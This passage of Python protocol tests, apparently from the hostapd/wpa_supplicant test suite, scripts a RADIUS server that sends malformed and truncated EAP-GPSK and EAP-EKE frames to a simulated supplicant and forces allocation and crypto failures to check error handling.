            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Missing RAND_Server")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Missing CSuite_List")
            return struct.pack(">BBHBBH8L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Truncated CSuite_List")
            return struct.pack(">BBHBBH8LH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Empty CSuite_List")
            return struct.pack(">BBHBBH8LH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Invalid CSuite_List")
            return struct.pack(">BBHBBH8LHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 1,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 No supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected GPSK-1")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            # Same valid GPSK-1 frame; the failure comes from the short
            # password configured in the runner loop below (i == 12).
            logger.info("Test: GPSK-1 Supported CSuite but too short key")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short GPSK-3")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_3)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Mismatch in RAND_Peer")
            return struct.pack(">BBHBB8L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 32,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_3,
                               0, 0, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Missing RAND_Server")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            # Echo back RAND_Peer from the received GPSK-2 (bytes 14..45).
            msg += req[14:46]
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Mismatch in RAND_Server")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8L", 1, 1, 1, 1, 1, 1, 1, 1)
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Missing ID_Server")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8L", 0, 0, 0, 0, 0, 0, 0, 0)
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Truncated ID_Server")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LH", 0, 0, 0, 0, 0, 0, 0, 0, 1)
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Mismatch in ID_Server")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 3,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHB", 0, 0, 0, 0, 0, 0, 0, 0, 1, ord('B'))
            return msg
        idx += 1
        if ctx['num'] == idx:
            # This GPSK-1 carries a one-octet ID_Server 'A' (note the
            # different length and format string vs. the other steps).
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBHB8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 3 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 1, ord('A'),
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Mismatch in ID_Server (same length)")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 3,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            # RAND_Peer starts one octet later here due to the one-octet
            # ID_Server in the preceding GPSK-1.
            msg += req[15:47]
            msg += struct.pack(">8LHB", 0, 0, 0, 0, 0, 0, 0, 0, 1, ord('B'))
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Missing CSuite_Sel")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LH", 0, 0, 0, 0, 0, 0, 0, 0, 0)
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Mismatch in CSuite_Sel")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2 + 6,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHLH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2)
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Missing len(PD_Payload_Block)")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2 + 6,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHLH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1)
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Truncated PD_Payload_Block")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2 + 6 + 2,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHLHH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1)
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Missing MAC")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2 + 6 + 3,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHLHHB",
                               0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 123)
            return msg
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Incorrect MAC")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2 + 6 + 3 + 16,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHLHHB4L",
                               0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 123,
                               0, 0, 0, 0)
            return msg
        return None
    srv = start_radius_server(gpsk_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        for i in range(0, 27):
            # i == 12 uses a password shorter than the 32 octets required
            # for the "too short key" step of the scripted handler.
            if i == 12:
                pw = "short"
            else:
                pw = "abcdefghijklmnop0123456789abcdef"
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="GPSK", identity="user", password=pw,
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.05)
            dev[0].request("REMOVE_NETWORK all")
    finally:
        stop_radius_server(srv)
# EAP-EKE exchange types (RFC 6124)
EAP_EKE_ID = 1
EAP_EKE_COMMIT = 2
EAP_EKE_CONFIRM = 3
EAP_EKE_FAILURE = 4
def test_eap_proto_eke(dev, apdev):
    """EAP-EKE protocol tests"""
    def eke_handler(ctx, req):
        # Scripted RADIUS EAP handler: ctx['num'] counts received EAP
        # messages and selects the scripted reply; ctx['id'] tracks the
        # EAP identifier. idx is incremented before each comparison so
        # steps can be inserted/removed without renumbering.
        # NOTE: req.encode("hex") is the Python 2 hex codec.
        logger.info("eke_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_EKE)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unknown exchange")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No NumProposals in EAP-EKE-ID/Request")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: NumProposals=0 in EAP-EKE-ID/Request")
            return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated Proposals list in EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               2, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported proposals in EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4B4B4B4B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4 * 4,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               4, 0,
                               0, 0, 0, 0,
                               3, 0, 0, 0,
                               3, 1, 0, 0,
                               3, 1, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing IDType/Identity in EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4B4B4B4B4B",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 5 * 4,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               5, 0,
                               0, 0, 0, 0,
                               3, 0, 0, 0,
                               3, 1, 0, 0,
                               3, 1, 1, 0,
                               3, 1, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4BB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               1, 0,
                               3, 1, 1, 1,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4BB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               1, 0,
                               3, 1, 1, 1,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4BB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               1, 0,
                               3, 1, 1, 1,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected EAP-EKE-Confirm/Request")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_CONFIRM)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short EAP-EKE-Failure/Request")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_FAILURE)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected EAP-EKE-Commit/Request")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_COMMIT)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4BB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               1, 0,
                               3, 1, 1, 1,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short EAP-EKE-Commit/Request")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_COMMIT)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            # Proposal 1,1,1,1 here (vs. 3,1,1,1 above) selects a
            # different dhgroup for the following Commit exchange.
            logger.info("Test: Valid EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4BB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               1, 0,
                               1, 1, 1, 1,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: All zeroes DHComponent_S and empty CBvalue in EAP-EKE-Commit/Request")
            return struct.pack(">BBHBB4L32L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16 + 128,
                               EAP_TYPE_EKE,
                               EAP_EKE_COMMIT,
                               0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short EAP-EKE-Confirm/Request")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_CONFIRM)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4BB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               1, 0,
                               1, 1, 1, 1,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: All zeroes DHComponent_S and empty CBvalue in EAP-EKE-Commit/Request")
            return struct.pack(">BBHBB4L32L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16 + 128,
                               EAP_TYPE_EKE,
                               EAP_EKE_COMMIT,
                               0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid PNonce_PS and Auth_S values in EAP-EKE-Confirm/Request")
            return struct.pack(">BBHBB4L8L5L5L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16 + 2 * 16 + 20 + 20,
                               EAP_TYPE_EKE,
                               EAP_EKE_CONFIRM,
                               0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               0, 0, 0, 0, 0,
                               0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        return None
    srv = start_radius_server(eke_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        for i in range(0, 14):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="EKE", identity="user", password="password",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            # Iterations 2..13 end with a scripted EAP-Failure, so wait
            # for the failure event instead of a fixed delay.
            if i in [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 ]:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            else:
                time.sleep(0.05)
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
def eap_eke_test_fail(dev, phase1=None, success=False):
    """Run one EAP-EKE attempt and verify the expected outcome.

    Starts an EAP-EKE connection attempt (with ERP enabled), waits for
    the EAP exchange to conclude, and raises if no result arrives in
    time or if a failure was expected but EAP-FAILURE was not reported.
    Removes the network configuration afterwards.
    """
    dev.connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                eap="EKE", identity="eke user", password="hello",
                phase1=phase1, erp="1", wait_connect=False)
    outcomes = ["CTRL-EVENT-EAP-FAILURE", "CTRL-EVENT-EAP-SUCCESS"]
    result = dev.wait_event(outcomes, timeout=5)
    if result is None:
        raise Exception("Timeout on EAP failure")
    failed = "CTRL-EVENT-EAP-FAILURE" in result
    if not (success or failed):
        raise Exception("EAP did not fail during failure test")
    dev.request("REMOVE_NETWORK all")
    dev.wait_disconnected()
def test_eap_proto_eke_errors(dev, apdev):
    """EAP-EKE local error cases"""
    check_eap_capa(dev[0], "EKE")
    params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], params)
    # Phase 1: allocation failure inside eap_eke_init itself; method
    # initialization is expected to fail before any EAP exchange starts.
    for i in range(1, 3):
        with alloc_fail(dev[0], i, "eap_eke_init"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="EKE", identity="eke user", password="hello",
                           wait_connect=False)
            ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    # Phase 2: forced failures (fail_test) in crypto/derivation steps
    # during the EKE exchange; each entry is (count, function[;caller],
    # optional phase1 parameter string for the network profile).
    tests = [ (1, "eap_eke_dh_init", None),
              (1, "eap_eke_prf_hmac_sha1", "dhgroup=3 encr=1 prf=1 mac=1"),
              (1, "eap_eke_prf_hmac_sha256", "dhgroup=5 encr=1 prf=2 mac=2"),
              (1, "eap_eke_prf", None),
              (1, "os_get_random;eap_eke_dhcomp", None),
              (1, "aes_128_cbc_encrypt;eap_eke_dhcomp", None),
              (1, "aes_128_cbc_decrypt;eap_eke_shared_secret", None),
              (1, "eap_eke_prf;eap_eke_shared_secret", None),
              (1, "eap_eke_prfplus;eap_eke_derive_ke_ki", None),
              (1, "eap_eke_prfplus;eap_eke_derive_ka", None),
              (1, "eap_eke_prfplus;eap_eke_derive_msk", None),
              (1, "os_get_random;eap_eke_prot", None),
              (1, "aes_128_cbc_decrypt;eap_eke_decrypt_prot", None),
              (1, "eap_eke_derive_key;eap_eke_process_commit", None),
              (1, "eap_eke_dh_init;eap_eke_process_commit", None),
              (1, "eap_eke_shared_secret;eap_eke_process_commit", None),
              (1, "eap_eke_derive_ke_ki;eap_eke_process_commit", None),
